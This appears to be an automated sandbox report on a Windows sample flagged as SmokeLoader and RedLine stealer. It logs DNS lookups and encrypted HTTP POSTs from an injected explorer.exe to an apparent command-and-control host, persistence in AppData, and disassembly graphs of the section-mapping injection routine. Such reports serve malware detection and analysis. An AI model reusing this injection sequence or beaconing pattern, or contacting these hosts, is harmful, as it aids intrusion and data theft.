                                            Oct 20, 2024 09:39:20.848520041 CEST1.1.1.1192.168.2.40xacdServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.848531961 CEST1.1.1.1192.168.2.40xacdServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:20.873393059 CEST1.1.1.1192.168.2.40x91a6Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:27.918654919 CEST1.1.1.1192.168.2.40xeccfServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:27.918673038 CEST1.1.1.1192.168.2.40xeccfServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:27.918683052 CEST1.1.1.1192.168.2.40xeccfServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:27.918694019 CEST1.1.1.1192.168.2.40xeccfServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.128823996 CEST1.1.1.1192.168.2.40xae7cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.128842115 CEST1.1.1.1192.168.2.40xae7cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.128850937 CEST1.1.1.1192.168.2.40xae7cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.128863096 CEST1.1.1.1192.168.2.40xae7cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.128931046 CEST1.1.1.1192.168.2.40xae7cServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:42.153511047 CEST1.1.1.1192.168.2.40x605bName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:51.006125927 CEST1.1.1.1192.168.2.40x1106Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:51.006141901 CEST1.1.1.1192.168.2.40x1106Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:51.006150961 CEST1.1.1.1192.168.2.40x1106Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:51.006161928 CEST1.1.1.1192.168.2.40x1106Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:39:51.006165981 CEST1.1.1.1192.168.2.40x1106Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.261745930 CEST1.1.1.1192.168.2.40x360Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.261797905 CEST1.1.1.1192.168.2.40x360Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.261809111 CEST1.1.1.1192.168.2.40x360Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.261816978 CEST1.1.1.1192.168.2.40x360Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:05.288279057 CEST1.1.1.1192.168.2.40x93ddName error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:13.759941101 CEST1.1.1.1192.168.2.40xffbeServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:13.759958029 CEST1.1.1.1192.168.2.40xffbeServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.140971899 CEST1.1.1.1192.168.2.40x898bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.140989065 CEST1.1.1.1192.168.2.40x898bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.140997887 CEST1.1.1.1192.168.2.40x898bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.141005993 CEST1.1.1.1192.168.2.40x898bServer failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:29.154721022 CEST1.1.1.1192.168.2.40x4a84Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.993104935 CEST1.1.1.1192.168.2.40x263Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.993119955 CEST1.1.1.1192.168.2.40x263Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.993127108 CEST1.1.1.1192.168.2.40x263Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.993135929 CEST1.1.1.1192.168.2.40x263Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:37.993146896 CEST1.1.1.1192.168.2.40x263Server failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.032890081 CEST1.1.1.1192.168.2.40x2d67Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.032912016 CEST1.1.1.1192.168.2.40x2d67Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.032924891 CEST1.1.1.1192.168.2.40x2d67Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.032937050 CEST1.1.1.1192.168.2.40x2d67Server failure (2)volisc.biznonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:51.053415060 CEST1.1.1.1192.168.2.40xcd97Name error (3)livbev.onlinenonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.940843105 CEST1.1.1.1192.168.2.40x3f1cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.940856934 CEST1.1.1.1192.168.2.40x3f1cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.940874100 CEST1.1.1.1192.168.2.40x3f1cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.940882921 CEST1.1.1.1192.168.2.40x3f1cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            Oct 20, 2024 09:40:59.940891027 CEST1.1.1.1192.168.2.40x3f1cServer failure (2)liverds.atnonenoneA (IP address)IN (0x0001)false
                                            • uepnecxbbbdpiq.org
                                              • tnc-corp.ru
                                            • strnbrsjeqnhidm.org
                                            • amjpnfqmtie.com
                                            • lkexyglvlsxrxq.org
                                            • kgbmakinbtdtwix.com
                                            • roqbxksriohvi.com
                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            0 | 192.168.2.4 | 55686 | 211.171.233.126 | 80 | 2580 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 20, 2024 09:38:53.869266987 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://uepnecxbbbdpiq.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 191
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:38:53.869303942 CEST | 191 | OUT | Data Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 40 b7 e8
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vuw@JGy{:Gb_u-x?kT`Q90B%HaG}6+e7}+uP


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            1 | 192.168.2.4 | 55718 | 211.171.233.126 | 80 | 2580 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 20, 2024 09:39:14.795099974 CEST | 284 | OUT | POST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://strnbrsjeqnhidm.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 176
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:39:14.795286894 CEST | 176 | OUT | Data Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 43 eb be
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vuwC@uQn4_JB8vOs;(VdVZ(C]0DNTka@ZH3Pw


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            2 | 192.168.2.4 | 55719 | 211.171.233.126 | 80 | 2580 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 20, 2024 09:39:31.911593914 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://amjpnfqmtie.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 268
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:39:31.911611080 CEST | 268 | OUT | Data Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 30 1a ba ac
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vu0a<@v_ui9UZ`8^lN;d5o\nd2~\E}5jR6B~D6rRM=jrPY>(MABa3CK0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            3 | 192.168.2.4 | 55720 | 211.171.233.126 | 80 | 2580 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 20, 2024 09:39:56.133203030 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://lkexyglvlsxrxq.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 317
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:39:56.133219004 CEST | 317 | OUT | Data Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 00 d1 bb
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vu8f*twwd_L5hE?/juA-tkOwIdJq'C1'K;'K"?))~o0=Da{n*b


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            4 | 192.168.2.4 | 54853 | 211.171.233.126 | 80 | 2580 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 20, 2024 09:40:21.077653885 CEST | 284 | OUT | POST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://kgbmakinbtdtwix.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 209
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:40:21.077682972 CEST | 209 | OUT | Data Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 39 54 d2 ba
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vu9Tu[G_`OD_(U:|[q5S8\;th{?Qn<!)d&z=U2


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            5 | 192.168.2.4 | 54854 | 211.171.233.126 | 80 | 2580 | C:\Windows\explorer.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 20, 2024 09:40:41.913100004 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://roqbxksriohvi.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 134
                                            Host: tnc-corp.ru
                                            Oct 20, 2024 09:40:41.913130045 CEST | 134 | OUT | Data Raw: 3b 6e 22 15 f0 c3 6d 55 dd ad c0 71 0e 70 7d be 77 7f ca 94 69 03 e2 64 0f 7e 7a 90 35 b4 c5 6f e8 5d c1 21 71 6c 26 1d e7 ed 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 1b fa bd
                                            Data Ascii: ;n"mUqp}wid~z5o]!ql&? 9Yt M@NA .[k,vu#^_>N9ep$@!HXBd


                                            Target ID:0
                                            Start time:03:36:58
                                            Start date:20/10/2024
                                            Path:C:\Users\user\Desktop\2Qvkmk7HGr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\2Qvkmk7HGr.exe"
                                            Imagebase:0x400000
                                            File size:376'832 bytes
                                            MD5 hash:4BB69F9FAD0620ECB64971676B9F2CBC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:03:37:05
                                            Start date:20/10/2024
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff72b770000
                                            File size:5'141'208 bytes
                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:5
                                            Start time:03:37:23
                                            Start date:20/10/2024
                                            Path:C:\Users\user\AppData\Roaming\tcgiwaf
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\tcgiwaf
                                            Imagebase:0x400000
                                            File size:376'832 bytes
                                            MD5 hash:4BB69F9FAD0620ECB64971676B9F2CBC
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2004791838.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2004938818.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 39%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:7
                                            Start time:03:40:01
                                            Start date:20/10/2024
                                            Path:C:\Users\user\AppData\Roaming\tcgiwaf
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\tcgiwaf
                                            Imagebase:0x400000
                                            File size:376'832 bytes
                                            MD5 hash:4BB69F9FAD0620ECB64971676B9F2CBC
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                              Execution Graph

                                              Execution Coverage:8.7%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:37.4%
                                              Total number of Nodes:107
                                              Total number of Limit Nodes:3
                                              [Execution graph (rendered figure not reproduced). Node clusters: the unpacking stub at 0x550000 (SetErrorMode, GetPEB, VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA); the injection routine at 0x401583 (NtDuplicateObject, NtCreateSection, NtMapViewOfSection), reached through the Sleep call at 0x4019a8 from 0x401919, 0x401959, 0x401970 and 0x40198a; a thread-creation path at 0x403054 (RtlCreateUserThread, NtTerminateProcess); and a module-enumeration path at 0x5314e7 (CreateToolhelp32Snapshot, Module32First, VirtualAlloc).]

                                              Control-flow Graph

                                              control_flow_graph 85 401583-4015de call 401207 97 4015e0 85->97 98 4015e3-4015e8 85->98 97->98 100 401909-401911 98->100 101 4015ee-4015ff 98->101 100->98 104 401916-401956 call 401207 100->104 105 401605-40162e 101->105 106 401907 101->106 105->106 113 401634-40164b NtDuplicateObject 105->113 106->104 113->106 115 401651-401675 NtCreateSection 113->115 117 4016d1-4016f7 NtCreateSection 115->117 118 401677-401698 NtMapViewOfSection 115->118 117->106 121 4016fd-401701 117->121 118->117 120 40169a-4016b6 NtMapViewOfSection 118->120 120->117 123 4016b8-4016ce 120->123 121->106 124 401707-401728 NtMapViewOfSection 121->124 123->117 124->106 126 40172e-40174a NtMapViewOfSection 124->126 126->106 130 401750 126->130 130->106 131 401750 call 401755 130->131 131->106
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                              • Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
                                              • Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                              • Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25

                                              Control-flow Graph

                                              control_flow_graph 132 40158e-4015b6 133 4015c8 132->133 134 4015bf-4015de call 401207 132->134 133->134 138 4015e0 134->138 139 4015e3-4015e8 134->139 138->139 141 401909-401911 139->141 142 4015ee-4015ff 139->142 141->139 145 401916-401956 call 401207 141->145 146 401605-40162e 142->146 147 401907 142->147 146->147 154 401634-40164b NtDuplicateObject 146->154 147->145 154->147 156 401651-401675 NtCreateSection 154->156 158 4016d1-4016f7 NtCreateSection 156->158 159 401677-401698 NtMapViewOfSection 156->159 158->147 162 4016fd-401701 158->162 159->158 161 40169a-4016b6 NtMapViewOfSection 159->161 161->158 164 4016b8-4016ce 161->164 162->147 165 401707-401728 NtMapViewOfSection 162->165 164->158 165->147 167 40172e-40174a NtMapViewOfSection 165->167 167->147 171 401750 167->171 171->147 172 401750 call 401755 171->172 172->147
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                              • Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
                                              • Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                              • Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24

                                              Control-flow Graph

                                              control_flow_graph 173 4015bc-4015c5 174 4015d0-4015de 173->174 175 4015ca call 401207 173->175 176 4015e0 174->176 177 4015e3-4015e8 174->177 175->174 176->177 179 401909-401911 177->179 180 4015ee-4015ff 177->180 179->177 183 401916-401956 call 401207 179->183 184 401605-40162e 180->184 185 401907 180->185 184->185 192 401634-40164b NtDuplicateObject 184->192 185->183 192->185 194 401651-401675 NtCreateSection 192->194 196 4016d1-4016f7 NtCreateSection 194->196 197 401677-401698 NtMapViewOfSection 194->197 196->185 200 4016fd-401701 196->200 197->196 199 40169a-4016b6 NtMapViewOfSection 197->199 199->196 202 4016b8-4016ce 199->202 200->185 203 401707-401728 NtMapViewOfSection 200->203 202->196 203->185 205 40172e-40174a NtMapViewOfSection 203->205 205->185 209 401750 205->209 209->185 210 401750 call 401755 209->210 210->185
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                              • Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
                                              • Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                              • Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20

                                              Control-flow Graph

                                              control_flow_graph 211 403054-403078 212 403197-40319c 211->212 213 40307e-403096 211->213 213->212 214 40309c-4030ad 213->214 215 4030af-4030b8 214->215 216 4030bd-4030cb 215->216 216->216 217 4030cd-4030d4 216->217 218 4030f6-4030fd 217->218 219 4030d6-4030f5 217->219 220 40311f-403122 218->220 221 4030ff-40311e 218->221 219->218 222 403124-403127 220->222 223 40312b 220->223 221->220 222->223 224 403129 222->224 223->215 225 40312d-403132 223->225 224->225 225->212 226 403134-403137 225->226 226->212 227 403139-403194 RtlCreateUserThread NtTerminateProcess 226->227 227->212
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: CreateProcessTerminateThreadUser
                                              • String ID:
                                              • API String ID: 1921587553-0
                                              • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                              • Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
                                              • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                              • Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5

                                              Control-flow Graph

                                              control_flow_graph 228 531c87-531ca0 229 531ca2-531ca4 228->229 230 531ca6 229->230 231 531cab-531cb7 CreateToolhelp32Snapshot 229->231 230->231 232 531cc7-531cd4 Module32First 231->232 233 531cb9-531cbf 231->233 234 531cd6-531cd7 call 531946 232->234 235 531cdd-531ce5 232->235 233->232 238 531cc1-531cc5 233->238 239 531cdc 234->239 238->229 238->232 239->235
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00531CAF
                                              • Module32First.KERNEL32(00000000,00000224), ref: 00531CCF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
